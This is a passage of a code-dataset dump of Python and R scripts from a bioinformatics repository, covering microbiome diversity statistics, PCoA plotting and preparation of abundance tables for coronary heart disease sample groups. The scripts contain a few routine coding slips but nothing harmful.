"content_id": "16693b0ce0ab0bb9a291620dfe15618d16fb2a3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 773,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 35,
"path": "/16S/otu_fasta.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# 根据 OTU ID 提取 fasta 序列, eg: python3 otu_fasta.py ../Temp/otuID ../Temp/otu_demo.fasta \nimport os,sys\n## write the fasta file into directory\notu_ID = sys.argv[1]\ninputFile = sys.argv[2]\nbasename = os.path.basename(inputFile)\noutFile = 'filter_' + basename\nfasta_dict = dict()\nwith open (inputFile, 'r') as IN:\n\tseq = ''\n\tkey = ''\n\tfor line in IN:\n\t\tif line.startswith('>'):\n\t\t\tfasta_dict[key] = seq\n\t\t\tkey = line\n\t\t\tseq = ''\n\t\telse:\n\t\t\tseq = seq + line\n\n\tfasta_dict[key] = seq\n\ndel fasta_dict['']\n\n#process otu ID file\nwith open(otu_ID, 'r') as IN, open(outFile, 'w') as out:\n\tfor line in IN:\n\t\tID = '>' + line\n\t\tif ID in fasta_dict:\n\t\t\tout.write(ID + fasta_dict[ID])\n\n'''\nfor key in fasta_dict:\n\tprint (key + '==>' + fasta_dict[key])\n'''\n"
},
{
"alpha_fraction": 0.6230414509773254,
"alphanum_fraction": 0.6488479375839233,
"avg_line_length": 44.20833206176758,
"blob_id": "dc33f5635c3a318d9ab1b12d4c9dfba8ba60b059",
"content_id": "833db6b2261dd90256910a5fc060a2e542b32cfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1115,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 24,
"path": "/boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "library(dplyr)\nlibrary(ggplot2)\nexp_div = read.table('exp_div.txt', header=T, row.names=1)\nggplot(exp_div, aes(x=factor(exp_div$Group, level=c('CK','Cigarette','E-liquid')), y=exp_div$shannon, fill = Group)) + geom_boxplot() + labs(x=\"\",y=\"shannon index\") + theme(\n axis.text = element_text(colour = 'black', size = 10), # 字号改成 20 放在 PPT 里比较合适\n axis.title = element_text(size = 10, face = 'bold'),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.position = c(0,0),\n legend.justification = c(0,0),\n legend.key = element_blank(),\n legend.text = element_text(size = 10),\n legend.key.width = unit(0.2, 'in'),\n legend.key.height = unit(0.2, 'in'),\n legend.background = element_blank(),\n panel.background = element_blank(),\n plot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in'))\n\n#差异检验\nck_sha = filter(exp_div, Group=='CK')$shannon\ncig_sha = filter(exp_div, Group=='Cigarette')$shannon\nel_sha = filter(exp_div, Group=='E-liquid')$shannon\nwilcox.test(ck_sha,cig_sha)$p.value\nwilcox.test(ck_sha,el_sha)$p.value\nwilcox.test(cig_sha,el_sha)$p.value\n"
},
{
"alpha_fraction": 0.6777408719062805,
"alphanum_fraction": 0.6910299062728882,
"avg_line_length": 42,
"blob_id": "091c3ccb1430ef52caea9c80901d8692e955bde8",
"content_id": "f08ca30f8a7444f4dc5ac4d2d3ffa7de82a47d56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 321,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 7,
"path": "/Humann2/pcl_generate.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#用于生成使用 humann2_barplot 画 barplot 的文件\nimport pandas as pd\ndt = pd.read_table(pathabd_rename.xls', index_col = 0)\ngroup = pd.read_table('phenotype.xls', index_col=0)\ngroup_dt = group['Group'].to_frame('Group')\ndt_merge = pd.concat([group_dt,dt.T], axis = 1)\ndt_merge.T.to_csv('pathabd.pcl',sep = '\\t')\n"
},
{
"alpha_fraction": 0.7292197942733765,
"alphanum_fraction": 0.7292197942733765,
"avg_line_length": 74.38461303710938,
"blob_id": "9514a7da328dd5ebbf19e424ebdea9204cba1dc6",
"content_id": "57eeb0b9fd2417f197e5760214d1ff5243f63386",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1961,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 26,
"path": "/rat/Mshannon_KW.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "\ndt = read.table('FrecoveryDiversity.txt', header=T)\ndt$Group = ordered(dt$Group, levels=c('CK','E-liquid','Cigarette'))\nresult = kruskal.test(shannon ~ Group, data = dt)\nkw_result = data.frame(unclass(result), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(kw_result,file = \"Frecovery_kruskal_shannon.txt\", sep = \"\\t\",quote = F,col.names=NA)\npairwise_wilcox = pairwise.wilcox.test(dt$shannon, dt$Group, p.adjust.method = \"BH\")\npairwise_wilcox = data.frame(unclass(pairwise_wilcox), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(pairwise_wilcox,file = \"Frecovery_pairwise_wilcox_shannon.txt\", sep = \"\\t\", quote = F,col.names=NA)\n\ndt = read.table('MrecoveryDiversity.txt', header=T)\ndt$Group = ordered(dt$Group, levels=c('CK','E-liquid','Cigarette'))\nresult = kruskal.test(shannon ~ Group, data = dt)\nkw_result = data.frame(unclass(result), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(kw_result,file = \"Mrecovery_kruskal_shannon.txt\", sep = \"\\t\",quote = F,col.names=NA)\npairwise_wilcox = pairwise.wilcox.test(dt$shannon, dt$Group, p.adjust.method = \"BH\")\npairwise_wilcox = data.frame(unclass(pairwise_wilcox), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(pairwise_wilcox,file = \"Mrecovery_pairwise_wilcox_shannon.txt\", sep = \"\\t\", quote = F,col.names=NA)\n\ndt = read.table('FrecoveryDiversity.txt', header=T)\ndt$Group = ordered(dt$Group, levels=c('CK','E-liquid','Cigarette'))\nresult = kruskal.test(number ~ Group, data = dt)\nkw_result = data.frame(unclass(result), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(kw_result,file = \"Frecovery_kruskal_number.txt\", sep = \"\\t\",quote = F,col.names=NA)\npairwise_wilcox = pairwise.wilcox.test(dt$number, dt$Group, p.adjust.method = \"BH\")\npairwise_wilcox = data.frame(unclass(pairwise_wilcox), check.names = FALSE, stringsAsFactors = FALSE)\nwrite.table(pairwise_wilcox,file = \"Frecovery_pairwise_wilcox_number.txt\", sep = \"\\t\", quote = F,col.names=NA)\n"
},
{
"alpha_fraction": 0.6175920367240906,
"alphanum_fraction": 0.650343120098114,
"avg_line_length": 45.463768005371094,
"blob_id": "2912665da25a6cf3edbcd8c06fdf5640a05732d2",
"content_id": "8b2f656919fb9224dbf3fe5cfb1296a2848e436a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 6468,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 138,
"path": "/PCoA.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/R\nlibrary(ggpubr)\nlibrary(\"ggplot2\")\nlibrary(\"ape\")\nlibrary(\"vegan\")\nlibrary(ggrepel)\nArgs <- commandArgs(TRUE)\nabd_table = Args[1] # 丰度文件 expose_abd.txt \ngroup_table = Args[2] # 分组文件 Sample_information_detail.txt \ngroup_list = Args[3] # Healthy:CASE\ncolor_list = Args[4] # 4daf4a:984ea3\nlegend_list = unlist(strsplit(group_list, \":\"))\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nfilename_prefix = gsub(\":\", \"_\", group_list)\n\n# plot PCoA \nprofile <- t(read.table(abd_table,header=T, row.names=1, sep = \"\\t\", check.name = F))\ngroup <- read.table(group_table, header=T, check.name = F)\nbeta.dis <- vegdist(profile, method = \"bray\")\nPCOA <- pcoa(beta.dis, correction=\"none\", rn=NULL)\nresult <- PCOA$values[,\"Relative_eig\"]\npco1 <- as.numeric(sprintf(\"%0.3f\",result[1]))*100\npco2 <- as.numeric(sprintf(\"%0.3f\",result[2]))*100\npc <- as.data.frame(PCOA$vectors)\npc$SampleID = rownames(profile)\nMerge.result <- merge(pc,group,by=\"SampleID\",all=TRUE)\nxlab=paste(\"PCoA1(\",pco1,\"%)\",sep=\"\")\nylab=paste(\"PCoA2(\",pco2,\"%)\",sep=\"\")\nMerge.result$Group = factor(Merge.result$Group, levels=legend_list)\npcoa = ggplot(Merge.result,aes(Axis.1,Axis.2)) +\n geom_point(size=3,aes(color=Group,shape=Group)) + \n geom_text_repel(aes(label = SampleID)) + #加标签\t\n scale_color_manual(values = color_var) + \n geom_hline(yintercept=0,linetype=4,color=\"grey\") +\n geom_vline(xintercept=0,linetype=4,color=\"grey\") +\n labs(x=xlab,y=ylab) +\n theme_bw() +\n theme(axis.text = element_text(colour = 'black', size = 10), \n\t\taxis.title = element_text(size = 12),\n\t\tpanel.background = element_rect(colour = \"black\", size = 1),\n\t\tpanel.grid =element_blank(), \n\t\tlegend.key = element_blank(),\n\t\tlegend.text = element_text(size = 10), \n\t\tlegend.title = element_blank(), legend.position='none', \n\t\tplot.margin = unit(c(0.4, 0.3, 0.1, 0.1 ), 'in'))\t\n\n# PCo1 & PCo2\npcoa1_diff = compare_means(Axis.1 ~ Group, Merge.result) ## default wilcox.test \nwrite.table(pcoa1_diff,file = paste(filename_prefix,\"_pcoa1_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(pcoa1_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) { # 增加没有差异检验结果显著的判断\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n my_comparisons[[row]] = diff_group\n}\npcoa1 = ggplot(Merge.result,aes(x=Group, y=Axis.1,colour=Group)) + geom_boxplot()+stat_compare_means(comparisons=my_comparisons, label = \"p.signif\", label.y = c(0.02,0.04,0.09) + max(Merge.result$Axis.1)) +\n scale_color_manual(values= color_var) + labs(x=\"\", y = \"PCoA1\") + \n scale_y_continuous(limits = c(min(Merge.result$Axis.1), max(Merge.result$Axis.1) + 0.1)) + \n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.4,0.3, 0, 0), 'in'))\n} else {\npcoa1 = ggplot(Merge.result,aes(x=Group, y=Axis.1,colour=Group)) + geom_boxplot() +\n scale_color_manual(values= color_var) + labs(x=\"\", y = \"PCoA1\") +\n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n 
axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.4,0.3, 0, 0), 'in'))\n}\n\npcoa2_diff = compare_means(Axis.2 ~ Group, Merge.result) ## default wilcox.test \nwrite.table(pcoa2_diff,file = paste(filename_prefix,\"_pcoa2_Diffresult.txt\", sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(pcoa2_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) { # 同上\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n my_comparisons[[row]] = diff_group\n}\npcoa2 = ggplot(Merge.result,aes(x=Group, y=Axis.2,colour=Group)) + geom_boxplot()+stat_compare_means(comparisons=my_comparisons, label = \"p.signif\",label.y = c(0.02,0.04,0.09) + max(Merge.result$Axis.2)) + \n scale_color_manual(values= color_var) + labs(x=\"\", y = \"PCoA2\") + \n scale_y_continuous(limits = c(min(Merge.result$Axis.2), max(Merge.result$Axis.2) + 0.1)) +\n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0, 0.3, 0.1, 0), 'in'))\n} else {\npcoa2 = ggplot(Merge.result,aes(x=Group, y=Axis.2,colour=Group)) + geom_boxplot() +\n scale_color_manual(values= color_var) + labs(x=\"\", y = \"PCoA2\") +\n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0, 0.3, 0.1, 0), 'in'))\n}\n#output\npdf(paste(filename_prefix,\"_PCoA.pdf\",sep=\"\"),width=6,height=4)\npng(paste(filename_prefix,\"_PCoA.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\nlibrary(grid)\nlibrary(\"gridBase\")\nplot.new()\nplotlayout <- grid.layout(nrow=2,ncol=3)\nvp1 <- viewport(layout.pos.col=c(1,2),layout.pos.row=c(1,2))\nvp2 <- viewport(layout.pos.col=3,layout.pos.row=1)\nvp3 <- viewport(layout.pos.col=3,layout.pos.row=2)\npushViewport(viewport(layout=plotlayout))\npushViewport(vp1)\npar(new=TRUE,fig=gridFIG(),mai=c(1.1,1,0.3,0.2))\nprint(pcoa,newpage=FALSE)\npopViewport()\n\npushViewport(vp2)\npar(new=TRUE,fig=gridFIG())\nprint(pcoa1,newpage=FALSE)\npopViewport()\n\npushViewport(vp3)\npar(new=TRUE,fig=gridFIG())\nprint(pcoa2,newpage=FALSE)\npopViewport()\n\ndev.off()\n"
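# A minimal sketch (an assumption, not the original code) for writing both the PDF and the PNG: wrap the viewport drawing in a function and replay it once per device, so only one device is ever open:\n# render_panels <- function() {\n#   plot.new()\n#   pushViewport(viewport(layout=plotlayout))\n#   pushViewport(vp1); par(new=TRUE,fig=gridFIG(),mai=c(1.1,1,0.3,0.2)); print(pcoa,newpage=FALSE); popViewport()\n#   pushViewport(vp2); par(new=TRUE,fig=gridFIG()); print(pcoa1,newpage=FALSE); popViewport()\n#   pushViewport(vp3); par(new=TRUE,fig=gridFIG()); print(pcoa2,newpage=FALSE); popViewport()\n# }\n# pdf(paste(filename_prefix,\"_PCoA.pdf\",sep=\"\"),width=6,height=4); render_panels(); dev.off()\n# png(paste(filename_prefix,\"_PCoA.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\"); render_panels(); dev.off()\n"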
},
{
"alpha_fraction": 0.5853304862976074,
"alphanum_fraction": 0.6043351888656616,
"avg_line_length": 38.63030242919922,
"blob_id": "879a56eb42767ca657c1800cfd0834676b4ed9bc",
"content_id": "237359a9d94b9b8a25d19e17129c225a7f179459",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13830,
"license_type": "no_license",
"max_line_length": 314,
"num_lines": 330,
"path": "/CHD/barplot.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 感觉非常个性化。。。所以就先不整合了,放在这里记录.. 包括生成物种组成柱状图,热图还有箱线图,涉及门水平,中水平,以及单独五个物种。\n## CHD\n#种的 barplot\nimport pandas as pd\ndt = pd.read_table('MetaPhlAn2_species.draw_barplot.txt', index_col = 0,sep='\\t')\ngroup = pd.read_table('Mapping.txt', index_col = 0, sep='\\t')\nmerge = pd.concat([dt,group.loc[dt.index]], axis=1)\nmerge['individual'] = merge.index\nnew_merge = merge.loc[:,['individual', 'level', 'abundance', 'Description']]\nnew_merge.columns.values[1] = 'tax'\nnew_merge.columns.values[3] = 'group'\nnew_merge.to_csv('CHD_barplot.txt', index=0, sep='\\t')\n\n## 合并后的 barplot\ndt = pd.read_table('Species.combine_relative_abundance.xls', index_col = 0, sep='\\t')\ntax_list = [\"Faecalibacterium_prausnitzii\",\"Escherichia_coli\",\"Eubacterium_rectale\",\"Subdoligranulum_unclassified\",\"Ruminococcus_bromii\",\"Bifidobacterium_adolescentis\",\"Klebsiella_pneumoniae\",\"Bifidobacterium_longum\",\"Alistipes_putredinis\",\"Bacteroides_vulgatus\",\"Escherichia_unclassified\",\"Bacteroides_uniformis\"]\ndt_13 = dt.loc[tax_list]\nother = dt[[False if x in tax_list else True for x in dt.index]] \nother_row = other.sum().to_frame(name = \"Others\").T\nmerge = pd.concat([dt_13, other_row])\nmerge.to_csv('CHD_combine_barplot.txt',sep = '\\t')\n\n#重新整理输出 barplot.txt\ndt = pd.read_table('CHD_combine_barplot.txt', sep='\\t', index_col=0)\nAMI = dt['AMI'].to_frame(name = 'abundance')\nAMI['group'] = 'AMI'\nsCAD = dt['sCAD'].to_frame(name = 'abundance')\nsCAD['group'] = 'sCAD'\nNCA = dt['NCA'].to_frame(name = 'abundance')\nNCA['group'] = 'NCA'\nmerge = pd.concat([AMI, sCAD, NCA])\nmerge['tax'] = merge.index\nmerge = merge[['tax','abundance', 'group']]\nmerge.to_csv('CHD_new_combine_barplot.txt', index = 0, sep = '\\t')\n\n# 计算 门 水平的 Zscore\n## 计算 z core\ndt = pd.read_table('Phylum.rabun.xls', index_col=0)\nfrom scipy.stats import zscore\ndt_z = dt.apply(zscore, axis=1).T\nNCA_mean = dt_z.loc[group.loc[group['Description'] == 'NCA'].index].mean().to_frame(name='NCA')\nsCAD_mean = dt_z.loc[group.loc[group['Description'] == 'sCAD'].index].mean().to_frame(name='sCAD')\nAMI_mean = dt_z.loc[group.loc[group['Description'] == 'AMI'].index].mean().to_frame(name='AMI')\nz_merge = pd.concat([NCA_mean,sCAD_mean,AMI_mean], axis=1)\n\n# 提取差异物种 ID\nNCA_sCAD = pd.read_table('Phylum_MetaPhlAn2.NCA-sCAD.wilcox.test.xls', index_col=0)\nNCA_AMI = pd.read_table('Phylum_MetaPhlAn2.NCA-AMI.wilcox.test.xls', index_col=0)\nAMI_sCAD = pd.read_table('Phylum_MetaPhlAn2.AMI-sCAD.wilcox.test.xls', index_col=0)\n\nNCA_sCAD_diff = list(NCA_sCAD.loc[NCA_sCAD['qvalue'] < 0.05].index)\nNCA_AMI_diff = list(NCA_AMI.loc[NCA_AMI['qvalue'] < 0.05].index)\nAMI_sCAD_diff = list(AMI_sCAD.loc[AMI_sCAD['qvalue'] < 0.05].index)\ndiff_tax = NCA_sCAD_diff + NCA_AMI_diff + AMI_sCAD_diff\ndiff_tax = list(set(diff_tax)) # 去重复\nz_plot = z_merge.loc[diff_tax].T\nz_plot.to_csv('zscore_phylum.txt', sep=\"\\t\")\n\n#注释的表格\ntemp = NCA_AMI.loc[NCA_AMI['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['NCA vs AMI'] = label\nNCA_AMI_p = temp.drop(['qvalue'], axis=1)\n\ntemp = NCA_sCAD.loc[NCA_sCAD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['NCA vs sCAD'] = label\nNCA_sCAD_p = temp.drop(['qvalue'], axis=1)\n\ntemp = AMI_sCAD.loc[AMI_sCAD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['sCAD vs AMI'] = label\nAMI_sCAD_p = temp.drop(['qvalue'], axis=1)\n\nall_p 
= pd.concat([AMI_sCAD_p,NCA_AMI_p,NCA_sCAD_p], axis=1)\nall_p.fillna('No.sig').to_csv('annotation_col.txt', sep='\\t')\n\n#计算种水平的 Zscore\ndt = pd.read_table('Species.rabun.xls', index_col=0)\nfrom scipy.stats import zscore\ndt_z = dt.apply(zscore, axis=1).T\nNCA_mean = dt_z.loc[group.loc[group['Description'] == 'NCA'].index].mean().to_frame(name='NCA')\nsCAD_mean = dt_z.loc[group.loc[group['Description'] == 'sCAD'].index].mean().to_frame(name='sCAD')\nAMI_mean = dt_z.loc[group.loc[group['Description'] == 'AMI'].index].mean().to_frame(name='AMI')\nz_merge = pd.concat([NCA_mean,sCAD_mean,AMI_mean], axis=1)\n\n# 提取差异物种 ID\nNCA_sCAD = pd.read_table('Species_MetaPhlAn2.NCA-sCAD.wilcox.test.xls', index_col=0)\nNCA_AMI = pd.read_table('Species_MetaPhlAn2.NCA-AMI.wilcox.test.xls', index_col=0)\nAMI_sCAD = pd.read_table('Species_MetaPhlAn2.AMI-sCAD.wilcox.test.xls', index_col=0)\n\nNCA_sCAD_diff = list(NCA_sCAD.loc[NCA_sCAD['qvalue'] < 0.05].index)\nNCA_AMI_diff = list(NCA_AMI.loc[NCA_AMI['qvalue'] < 0.05].index)\nAMI_sCAD_diff = list(AMI_sCAD.loc[AMI_sCAD['qvalue'] < 0.05].index)\ndiff_tax = NCA_sCAD_diff + NCA_AMI_diff + AMI_sCAD_diff\ndiff_tax = list(set(diff_tax)) # 去重复\nz_plot = z_merge.loc[diff_tax].T\nz_plot.to_csv('zscore_species.txt', sep=\"\\t\")\n\n# 生成标签\ntemp = NCA_AMI.loc[NCA_AMI['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['NCA vs AMI'] = label\nNCA_AMI_p = temp.drop(['qvalue'], axis=1)\n\ntemp = NCA_sCAD.loc[NCA_sCAD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['NCA vs sCAD'] = label\nNCA_sCAD_p = temp.drop(['qvalue'], axis=1)\n\ntemp = AMI_sCAD.loc[AMI_sCAD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'P<0.01' if x < 0.01 else 'P<0.05' for x in temp['qvalue']]\ntemp['sCAD vs AMI'] = label\nAMI_sCAD_p = temp.drop(['qvalue'], axis=1)\n\nall_p = pd.concat([AMI_sCAD_p,NCA_AMI_p,NCA_sCAD_p], axis=1)\nall_p.fillna('No.sig').to_csv('species_annotation_col.txt', sep='\\t')\n\n# 挑选出的五个物种\ndt = pd.read_table('zscore_species.txt', index_col=0)\nitems = [\"Lactobacillus_mucosae\", \"Lactobacillus_crispatus\", \"Atopobium_parvulum\", \"Alistipes_onderdonkii\", \"Pyramidobacter_piscolens\"]\nfive_zscore = dt[items]\nfive_zscore.to_csv('zscore_five_species.txt',sep=\"\\t\")\nanno = pd.read_table('species_annotation_col.txt', index_col=0)\nanno.loc[items].to_csv('five_species_annotation_col.txt', sep='\\t')\n\n## 直接生成差异物种(患者和健康人)的箱线图,患者之间单独比吧...\n## 门水平\ndiff = dict()\nwith open('Phylum_MetaPhlAn2.NCA-sCAD.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n diff[line[0]] = line[9]\n else:\n continue\n\ncase_list = ['sCAD', 'AMI']\nhc_list = ['NCA']\n\nwith open('Phylum_MetaPhlAn2.NCA-AMI.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n if line[0] in diff:\n if diff[line[0]] in case_list and line[9] in case_list:\n continue\n elif diff[line[0]] in hc_list and line[9] in hc_list:\n continue\n else:\n print(line)\n del diff[line[0]]\n else:\n diff[line[0]] = line[9]\n else:\n continue\n\n#print(diff)\ncase_tax = list()\nhc_tax = list() \n \nfor key in diff:\n if diff[key] in case_list:\n case_tax.append(key)\n else:\n hc_tax.append(key)\n\n## 对患者和健康人每组的物种按照所有样本均值的大小排序,得到 R 画图的 x 轴的顺序\ndt = pd.read_table('Phylum.rabun.xls', index_col=0)\ncase_order = 
list(dt.loc[case_tax].mean(axis=1).sort_values(ascending = False).index)\nhc_order = list(dt.loc[hc_tax].mean(axis=1).sort_values(ascending = False).index)\nall_order = case_order[:14] + hc_order\nprint(':'.join(all_order))\n\n# 有时候需要个性化一下\n#all_order = [\"Verrucomicrobia\",\"Synergistetes\"]\n\n# 根据到的物种 ID 从丰度表里提取数据并且生成画箱线图的数据\n#dt = pd.read_table('Species.rabun.xls', index_col=0)\ndt.loc[all_order].to_csv('diff_species_abd.txt', sep='\\t')\ngroup = pd.read_table('Mapping.txt', index_col=0)\ngroup_dict = group.to_dict()\nwith open('diff_phylum_abd.txt', 'r') as abd, open('phylum_boxplot.txt', 'w') as out:\n print('ID\\tAbd\\tGroup', file=out)\n head = abd.readline().strip('\\n').split('\\t')\n for line in abd:\n line = line.strip('\\n').split('\\t')\n if line[0] in all_order:\n for index in range(1,len(line)):\n if float(line[index]) != 0:\n print(line[0] + '\\t'+ line[index] + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n else:\n print(line[0] + '\\t'+ \"1e-06\" + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n\n### 种水平的处理\ndiff = dict()\nwith open('Species_MetaPhlAn2.NCA-sCAD.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n diff[line[0]] = line[9]\n else:\n continue\n\ncase_list = ['sCAD', 'AMI']\nhc_list = ['NCA']\n\nwith open('Species_MetaPhlAn2.NCA-AMI.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n if line[0] in diff:\n if diff[line[0]] in case_list and line[9] in case_list:\n continue\n elif diff[line[0]] in hc_list and line[9] in hc_list:\n continue\n else:\n print(line)\n del diff[line[0]]\n else:\n diff[line[0]] = line[9]\n else:\n continue\n\n#print(diff)\ncase_tax = list()\nhc_tax = list() \n \nfor key in diff:\n if diff[key] in case_list:\n case_tax.append(key)\n else:\n hc_tax.append(key)\n\n## 对患者和健康人每组的物种按照所有样本均值的大小排序,得到 R 画图的 x 轴的顺序\ndt = pd.read_table('Species.rabun.xls', index_col=0)\ncase_order = list(dt.loc[case_tax].mean(axis=1).sort_values(ascending = False).index)\nhc_order = list(dt.loc[hc_tax].mean(axis=1).sort_values(ascending = False).index)\nall_order = case_order[:14] + hc_order\nprint(':'.join(all_order))\n\n# 根据到的物种 ID 从丰度表里提取数据并且生成画箱线图的数据\ndt = pd.read_table('Species.rabun.xls', index_col=0)\ndt.loc[all_order].to_csv('diff_species_abd.txt', sep='\\t')\ngroup = pd.read_table('Mapping.txt', index_col=0)\ngroup_dict = group.to_dict()\nwith open('diff_species_abd.txt', 'r') as abd, open('species_boxplot.txt', 'w') as out:\n print('ID\\tAbd\\tGroup', file=out)\n head = abd.readline().strip('\\n').split('\\t')\n for line in abd:\n line = line.strip('\\n').split('\\t')\n if line[0] in all_order:\n for index in range(1,len(line)):\n if float(line[index]) != 0:\n print(line[0] + '\\t'+ line[index] + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n else:\n print(line[0] + '\\t'+ \"1e-06\" + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n\n### 五个物种的的处理\ndiff = dict()\nwith open('Species_MetaPhlAn2.NCA-sCAD.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n diff[line[0]] = line[9]\n else:\n continue\n\ncase_list = ['sCAD', 'AMI']\nhc_list = ['NCA']\n\nwith open('Species_MetaPhlAn2.NCA-AMI.wilcox.test.xls') as IN:\n IN.readline()\n for line in IN:\n line = line.strip('\\n').split('\\t')\n if float(line[11]) < 0.05:\n if line[0] in diff:\n 
if diff[line[0]] in case_list and line[9] in case_list:\n continue\n elif diff[line[0]] in hc_list and line[9] in hc_list:\n continue\n else:\n print(line)\n del diff[line[0]]\n else:\n diff[line[0]] = line[9]\n else:\n continue\n\n#print(diff)\ncase_tax = list()\nhc_tax = list() \n\nitems = [\"Lactobacillus_mucosae\", \"Lactobacillus_crispatus\", \"Atopobium_parvulum\", \"Alistipes_onderdonkii\", \"Pyramidobacter_piscolens\"]\nfor key in items:\n if key in diff:\n#for key in diff:\n if diff[key] in case_list:\n case_tax.append(key)\n else:\n hc_tax.append(key)\n\n## 对患者和健康人每组的物种按照所有样本均值的大小排序,得到 R 画图的 x 轴的顺序\ndt = pd.read_table('Species.rabun.xls', index_col=0)\ncase_order = list(dt.loc[case_tax].mean(axis=1).sort_values(ascending = False).index)\nhc_order = list(dt.loc[hc_tax].mean(axis=1).sort_values(ascending = False).index)\nall_order = case_order[:14] + hc_order\nprint(':'.join(all_order))\n\n# 根据到的物种 ID 从丰度表里提取数据并且生成画箱线图的数据\n#dt = pd.read_table('Species.rabun.xls', index_col=0)\ndt.loc[all_order].to_csv('five_diff_species_abd.txt', sep='\\t')\ngroup = pd.read_table('Mapping.txt', index_col=0)\ngroup_dict = group.to_dict()\nwith open('five_diff_species_abd.txt', 'r') as abd, open('five_species_boxplot.txt', 'w') as out:\n print('ID\\tAbd\\tGroup', file=out)\n head = abd.readline().strip('\\n').split('\\t')\n for line in abd:\n line = line.strip('\\n').split('\\t')\n if line[0] in all_order:\n for index in range(1,len(line)):\n if float(line[index]) != 0:\n print(line[0] + '\\t'+ line[index] + '\\t' + 